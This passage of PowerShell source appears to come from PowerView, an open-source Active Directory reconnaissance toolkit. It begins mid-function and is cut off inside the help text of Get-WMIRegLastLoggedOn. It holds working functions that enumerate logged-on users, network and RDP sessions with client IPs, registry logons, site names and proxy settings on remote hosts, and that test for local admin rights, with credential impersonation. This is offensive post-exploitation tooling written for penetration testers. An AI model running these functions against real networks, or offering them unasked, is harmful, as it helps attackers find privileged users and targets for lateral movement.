-gt 0)) {\n\n                # work out how much to increment the pointer by finding out the size of the structure\n                $Increment = $SHARE_INFO_1::GetSize()\n\n                # parse all the result structures\n                for ($i = 0; ($i -lt $EntriesRead); $i++) {\n                    # create a new int ptr at the given offset and cast the pointer as our result structure\n                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset\n                    $Info = $NewIntPtr -as $SHARE_INFO_1\n\n                    # return all the sections of the structure - have to do it this way for V2\n                    $Share = $Info | Select-Object *\n                    $Share | Add-Member Noteproperty 'ComputerName' $Computer\n                    $Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo')\n                    $Offset = $NewIntPtr.ToInt64()\n                    $Offset += $Increment\n                    $Share\n                }\n\n                # free up the result buffer\n                $Null = $Netapi32::NetApiBufferFree($PtrInfo)\n            }\n            else {\n                Write-Verbose \"[Get-NetShare] Error: $(([ComponentModel.Win32Exception] $Result).Message)\"\n            }\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-NetLoggedon {\n<#\n.SYNOPSIS\n\nReturns users logged on the local (or a remote) machine.\nNote: administrative rights needed for newer Windows OSes.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  \n\n.DESCRIPTION\n\nThis function will execute the NetWkstaUserEnum Win32API call to query\na given host for actively logged on users.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for logged on users (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nGet-NetLoggedon\n\nReturns users actively logged onto the local host.\n\n.EXAMPLE\n\nGet-NetLoggedon -ComputerName sqlserver\n\nReturns users actively logged onto the 'sqlserver' host.\n\n.EXAMPLE\n\nGet-DomainComputer | Get-NetLoggedon\n\nReturns all logged on users for all computers in the domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-NetLoggedon -ComputerName sqlserver -Credential $Cred\n\n.OUTPUTS\n\nPowerView.LoggedOnUserInfo\n\nA PSCustomObject representing a WKSTA_USER_INFO_1 structure, including\nthe UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.\n\n.LINK\n\nhttp://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/\n#>\n\n    [OutputType('PowerView.LoggedOnUserInfo')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # declare the reference variables\n            $QueryLevel = 1\n            $PtrInfo = [IntPtr]::Zero\n            $EntriesRead = 0\n            $TotalRead = 0\n            $ResumeHandle = 0\n\n            # get logged on user information\n            $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)\n\n            # locate the offset of the initial intPtr\n            $Offset = $PtrInfo.ToInt64()\n\n            # 0 = success\n            if (($Result -eq 0) -and ($Offset -gt 0)) {\n\n                # work out how much to increment the pointer by finding out the size of the structure\n                $Increment = $WKSTA_USER_INFO_1::GetSize()\n\n                # parse all the result structures\n                for ($i = 0; ($i -lt $EntriesRead); $i++) {\n                    # create a new int ptr at the given offset and cast the pointer as our result structure\n                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset\n                    $Info = $NewIntPtr -as $WKSTA_USER_INFO_1\n\n                    # return all the sections of the structure - have to do it this way for V2\n                    $LoggedOn = $Info | Select-Object *\n                    $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer\n                    $LoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo')\n                    $Offset = $NewIntPtr.ToInt64()\n                    $Offset += $Increment\n                    $LoggedOn\n                }\n\n                # free up the result buffer\n                $Null = $Netapi32::NetApiBufferFree($PtrInfo)\n            }\n            else {\n                Write-Verbose \"[Get-NetLoggedon] Error: $(([ComponentModel.Win32Exception] $Result).Message)\"\n            }\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-NetSession {\n<#\n.SYNOPSIS\n\nReturns session information for the local (or a remote) machine.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  \n\n.DESCRIPTION\n\nThis function will execute the NetSessionEnum Win32API call to query\na given host for active sessions.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for sessions (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nGet-NetSession\n\nReturns active sessions on the local host.\n\n.EXAMPLE\n\nGet-NetSession -ComputerName sqlserver\n\nReturns active sessions on the 'sqlserver' host.\n\n.EXAMPLE\n\nGet-DomainController | Get-NetSession\n\nReturns active sessions on all domain controllers.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-NetSession -ComputerName sqlserver -Credential $Cred\n\n.OUTPUTS\n\nPowerView.SessionInfo\n\nA PSCustomObject representing a WKSTA_USER_INFO_1 structure, including\nthe CName/UserName/Time/IdleTime for each session, with the ComputerName added.\n\n.LINK\n\nhttp://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/\n#>\n\n    [OutputType('PowerView.SessionInfo')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # arguments for NetSessionEnum\n            $QueryLevel = 10\n            $PtrInfo = [IntPtr]::Zero\n            $EntriesRead = 0\n            $TotalRead = 0\n            $ResumeHandle = 0\n\n            # get session information\n            $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)\n\n            # locate the offset of the initial intPtr\n            $Offset = $PtrInfo.ToInt64()\n\n            # 0 = success\n            if (($Result -eq 0) -and ($Offset -gt 0)) {\n\n                # work out how much to increment the pointer by finding out the size of the structure\n                $Increment = $SESSION_INFO_10::GetSize()\n\n                # parse all the result structures\n                for ($i = 0; ($i -lt $EntriesRead); $i++) {\n                    # create a new int ptr at the given offset and cast the pointer as our result structure\n                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset\n                    $Info = $NewIntPtr -as $SESSION_INFO_10\n\n                    # return all the sections of the structure - have to do it this way for V2\n                    $Session = $Info | Select-Object *\n                    $Session | Add-Member Noteproperty 'ComputerName' $Computer\n                    $Session.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo')\n                    $Offset = $NewIntPtr.ToInt64()\n                    $Offset += $Increment\n                    $Session\n                }\n\n                # free up the result buffer\n                $Null = $Netapi32::NetApiBufferFree($PtrInfo)\n            }\n            else {\n                Write-Verbose \"[Get-NetSession] Error: $(([ComponentModel.Win32Exception] $Result).Message)\"\n            }\n        }\n    }\n\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-RegLoggedOn {\n<#\n.SYNOPSIS\n\nReturns who is logged onto the local (or a remote) machine\nthrough enumeration of remote registry keys.\n\nNote: This function requires only domain user rights on the\nmachine you're enumerating, but remote registry must be enabled.\n\nAuthor: Matt Kelly (@BreakersAll)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID  \n\n.DESCRIPTION\n\nThis function will query the HKU registry values to retrieve the local\nlogged on users SID and then attempt and reverse it.\nAdapted technique from Sysinternal's PSLoggedOn script. Benefit over\nusing the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges\nrequired (NetWkstaUserEnum requires remote admin access).\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for remote registry values (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nGet-RegLoggedOn\n\nReturns users actively logged onto the local host.\n\n.EXAMPLE\n\nGet-RegLoggedOn -ComputerName sqlserver\n\nReturns users actively logged onto the 'sqlserver' host.\n\n.EXAMPLE\n\nGet-DomainController | Get-RegLoggedOn\n\nReturns users actively logged on all domain controllers.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-RegLoggedOn -ComputerName sqlserver -Credential $Cred\n\n.OUTPUTS\n\nPowerView.RegLoggedOnUser\n\nA PSCustomObject including the UserDomain/UserName/UserSID of each\nactively logged on user, with the ComputerName added.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.RegLoggedOnUser')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost'\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            try {\n                # retrieve HKU remote registry values\n                $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', \"$ComputerName\")\n\n                # sort out bogus sid's like _class\n                $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object {\n                    $UserName = ConvertFrom-SID -ObjectSID $_ -OutputType 'DomainSimple'\n\n                    if ($UserName) {\n                        $UserName, $UserDomain = $UserName.Split('@')\n                    }\n                    else {\n                        $UserName = $_\n                        $UserDomain = $Null\n                    }\n\n                    $RegLoggedOnUser = New-Object PSObject\n                    $RegLoggedOnUser | Add-Member Noteproperty 'ComputerName' \"$ComputerName\"\n                    $RegLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain\n                    $RegLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName\n                    $RegLoggedOnUser | Add-Member Noteproperty 'UserSID' $_\n                    $RegLoggedOnUser.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser')\n                    $RegLoggedOnUser\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-RegLoggedOn] Error opening remote registry on '$ComputerName' : $_\"\n            }\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-NetRDPSession {\n<#\n.SYNOPSIS\n\nReturns remote desktop/session information for the local (or a remote) machine.\n\nNote: only members of the Administrators or Account Operators local group\ncan successfully execute this functionality on a remote target.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  \n\n.DESCRIPTION\n\nThis function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation\nWin32API calls to query a given RDP remote service for active sessions and originating\nIPs. This is a replacement for qwinsta.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for active sessions (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nGet-NetRDPSession\n\nReturns active RDP/terminal sessions on the local host.\n\n.EXAMPLE\n\nGet-NetRDPSession -ComputerName \"sqlserver\"\n\nReturns active RDP/terminal sessions on the 'sqlserver' host.\n\n.EXAMPLE\n\nGet-DomainController | Get-NetRDPSession\n\nReturns active RDP/terminal sessions on all domain controllers.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-NetRDPSession -ComputerName sqlserver -Credential $Cred\n\n.OUTPUTS\n\nPowerView.RDPSessionInfo\n\nA PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,\nwith the ComputerName added.\n\n.LINK\n\nhttps://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx\n#>\n\n    [OutputType('PowerView.RDPSessionInfo')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n\n            # open up a handle to the Remote Desktop Session host\n            $Handle = $Wtsapi32::WTSOpenServerEx($Computer)\n\n            # if we get a non-zero handle back, everything was successful\n            if ($Handle -ne 0) {\n\n                # arguments for WTSEnumerateSessionsEx\n                $ppSessionInfo = [IntPtr]::Zero\n                $pCount = 0\n\n                # get information on all current sessions\n                $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n                # locate the offset of the initial intPtr\n                $Offset = $ppSessionInfo.ToInt64()\n\n                if (($Result -ne 0) -and ($Offset -gt 0)) {\n\n                    # work out how much to increment the pointer by finding out the size of the structure\n                    $Increment = $WTS_SESSION_INFO_1::GetSize()\n\n                    # parse all the result structures\n                    for ($i = 0; ($i -lt $pCount); $i++) {\n\n                        # create a new int ptr at the given offset and cast the pointer as our result structure\n                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset\n                        $Info = $NewIntPtr -as $WTS_SESSION_INFO_1\n\n                        $RDPSession = New-Object PSObject\n\n                        if ($Info.pHostName) {\n                            $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName\n                        }\n                        else {\n                            # if no hostname returned, use the specified hostname\n                            $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer\n                        }\n\n                        $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName\n\n                        if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) {\n                            # if a domain isn't returned just use the username\n                            $RDPSession | Add-Member Noteproperty 'UserName' \"$($Info.pUserName)\"\n                        }\n                        else {\n                            $RDPSession | Add-Member Noteproperty 'UserName' \"$($Info.pDomainName)\\$($Info.pUserName)\"\n                        }\n\n                        $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID\n                        $RDPSession | Add-Member Noteproperty 'State' $Info.State\n\n                        $ppBuffer = [IntPtr]::Zero\n                        $pBytesReturned = 0\n\n                        # query for the source client IP with WTSQuerySessionInformation\n                        #   https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx\n                        $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n                        if ($Result2 -eq 0) {\n                            Write-Verbose \"[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError2).Message)\"\n                        }\n                        else {\n                            $Offset2 = $ppBuffer.ToInt64()\n                            $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2\n                            $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS\n\n                            $SourceIP = $Info2.Address\n                            if ($SourceIP[2] -ne 0) {\n                                $SourceIP = [String]$SourceIP[2]+'.'+[String]$SourceIP[3]+'.'+[String]$SourceIP[4]+'.'+[String]$SourceIP[5]\n                            }\n                            else {\n                                $SourceIP = $Null\n                            }\n\n                            $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP\n                            $RDPSession.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo')\n                            $RDPSession\n\n                            # free up the memory buffer\n                            $Null = $Wtsapi32::WTSFreeMemory($ppBuffer)\n\n                            $Offset += $Increment\n                        }\n                    }\n                    # free up the memory result buffer\n                    $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount)\n                }\n                else {\n                    Write-Verbose \"[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n                }\n                # close off the service handle\n                $Null = $Wtsapi32::WTSCloseServer($Handle)\n            }\n            else {\n                Write-Verbose \"[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName\"\n            }\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Test-AdminAccess {\n<#\n.SYNOPSIS\n\nTests if the current user has administrative access to the local (or a remote) machine.\n\nIdea stolen from the local_admin_search_enum post module in Metasploit written by:  \n    'Brandon McCann \"zeknox\" <bmccann[at]accuvant.com>'  \n    'Thomas McCarthy \"smilingraccoon\" <smilingraccoon[at]gmail.com>'  \n    'Royce Davis \"r3dy\" <rdavis[at]accuvant.com>'  \n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  \n\n.DESCRIPTION\n\nThis function will use the OpenSCManagerW Win32API call to establish\na handle to the remote host. If this succeeds, the current user context\nhas local administrator acess to the target.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to check for local admin access (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nTest-AdminAccess -ComputerName sqlserver\n\nReturns results indicating whether the current user has admin access to the 'sqlserver' host.\n\n.EXAMPLE\n\nGet-DomainComputer | Test-AdminAccess\n\nReturns what machines in the domain the current user has access to.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nTest-AdminAccess -ComputerName sqlserver -Credential $Cred\n\n.OUTPUTS\n\nPowerView.AdminAccess\n\nA PSCustomObject containing the ComputerName and 'IsAdmin' set to whether\nthe current user has local admin rights, along with the ComputerName added.\n\n.LINK\n\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb\nhttp://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/\n#>\n\n    [OutputType('PowerView.AdminAccess')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # 0xF003F - SC_MANAGER_ALL_ACCESS\n            #   http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx\n            $Handle = $Advapi32::OpenSCManagerW(\"\\\\$Computer\", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            $IsAdmin = New-Object PSObject\n            $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer\n\n            # if we get a non-zero handle back, everything was successful\n            if ($Handle -ne 0) {\n                $Null = $Advapi32::CloseServiceHandle($Handle)\n                $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True\n            }\n            else {\n                Write-Verbose \"[Test-AdminAccess] Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n                $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False\n            }\n            $IsAdmin.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess')\n            $IsAdmin\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-NetComputerSiteName {\n<#\n.SYNOPSIS\n\nReturns the AD site where the local (or a remote) machine resides.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  \n\n.DESCRIPTION\n\nThis function will use the DsGetSiteName Win32API call to look up the\nname of the site where a specified computer resides.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to check the site for (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nGet-NetComputerSiteName -ComputerName WINDOWS1.testlab.local\n\nReturns the site for WINDOWS1.testlab.local.\n\n.EXAMPLE\n\nGet-DomainComputer | Get-NetComputerSiteName\n\nReturns the sites for every machine in AD.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred\n\n.OUTPUTS\n\nPowerView.ComputerSite\n\nA PSCustomObject containing the ComputerName, IPAddress, and associated Site name.\n#>\n\n    [OutputType('PowerView.ComputerSite')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # if we get an IP address, try to resolve the IP to a hostname\n            if ($Computer -match '^(?:[0-9]{1,3}\\.){3}[0-9]{1,3}$') {\n                $IPAddress = $Computer\n                $Computer = [System.Net.Dns]::GetHostByAddress($Computer) | Select-Object -ExpandProperty HostName\n            }\n            else {\n                $IPAddress = @(Resolve-IPAddress -ComputerName $Computer)[0].IPAddress\n            }\n\n            $PtrInfo = [IntPtr]::Zero\n\n            $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo)\n\n            $ComputerSite = New-Object PSObject\n            $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer\n            $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress\n\n            if ($Result -eq 0) {\n                $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo)\n                $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename\n            }\n            else {\n                Write-Verbose \"[Get-NetComputerSiteName] Error: $(([ComponentModel.Win32Exception] $Result).Message)\"\n                $ComputerSite | Add-Member Noteproperty 'SiteName' ''\n            }\n            $ComputerSite.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite')\n\n            # free up the result buffer\n            $Null = $Netapi32::NetApiBufferFree($PtrInfo)\n\n            $ComputerSite\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-WMIRegProxy {\n<#\n.SYNOPSIS\n\nEnumerates the proxy server and WPAD conents for the current user.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nEnumerates the proxy server and WPAD specification for the current user\non the local machine (default), or a machine specified with -ComputerName.\nIt does this by enumerating settings from\nHKU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings.\n\n.PARAMETER ComputerName\n\nSpecifies the system to enumerate proxy settings on. Defaults to the local host.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connecting to the remote system.\n\n.EXAMPLE\n\nGet-WMIRegProxy\n\nComputerName           ProxyServer            AutoConfigURL         Wpad\n------------           -----------            -------------         ----\nWINDOWS1               http://primary.test...\n\n.EXAMPLE\n\n$Cred = Get-Credential \"TESTLAB\\administrator\"\nGet-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local\n\nComputerName            ProxyServer            AutoConfigURL         Wpad\n------------            -----------            -------------         ----\nwindows1.testlab.local  primary.testlab.local\n\n.INPUTS\n\nString\n\nAccepts one or more computer name specification strings  on the pipeline (netbios or FQDN).\n\n.OUTPUTS\n\nPowerView.ProxySettings\n\nOutputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.\n#>\n\n    [OutputType('PowerView.ProxySettings')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = $Env:COMPUTERNAME,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            try {\n                $WmiArguments = @{\n                    'List' = $True\n                    'Class' = 'StdRegProv'\n                    'Namespace' = 'root\\default'\n                    'Computername' = $Computer\n                    'ErrorAction' = 'Stop'\n                }\n                if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }\n\n                $RegProvider = Get-WmiObject @WmiArguments\n                $Key = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings'\n\n                # HKEY_CURRENT_USER\n                $HKCU = 2147483649\n                $ProxyServer = $RegProvider.GetStringValue($HKCU, $Key, 'ProxyServer').sValue\n                $AutoConfigURL = $RegProvider.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue\n\n                $Wpad = ''\n                if ($AutoConfigURL -and ($AutoConfigURL -ne '')) {\n                    try {\n                        $Wpad = (New-Object Net.WebClient).DownloadString($AutoConfigURL)\n                    }\n                    catch {\n                        Write-Warning \"[Get-WMIRegProxy] Error connecting to AutoConfigURL : $AutoConfigURL\"\n                    }\n                }\n\n                if ($ProxyServer -or $AutoConfigUrl) {\n                    $Out = New-Object PSObject\n                    $Out | Add-Member Noteproperty 'ComputerName' $Computer\n                    $Out | Add-Member Noteproperty 'ProxyServer' $ProxyServer\n                    $Out | Add-Member Noteproperty 'AutoConfigURL' $AutoConfigURL\n                    $Out | Add-Member Noteproperty 'Wpad' $Wpad\n                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings')\n                    $Out\n                }\n                else {\n                    Write-Warning \"[Get-WMIRegProxy] No proxy settings found for $ComputerName\"\n                }\n            }\n            catch {\n                Write-Warning \"[Get-WMIRegProxy] Error enumerating proxy settings for $ComputerName : $_\"\n            }\n        }\n    }\n}\n\n\nfunction Get-WMIRegLastLoggedOn {\n<#\n.SYNOPSIS\n\nReturns the last user who logged onto the local (or a remote) machine.\n\nNote: This function requires administrative rights on the machine you're enumerating.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nThis function uses remote registry to enumerate the LastLoggedOnUser registry key\nfor the local (or remote) machine.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for remote registry values (also accepts IP addresses).\nDefaults to 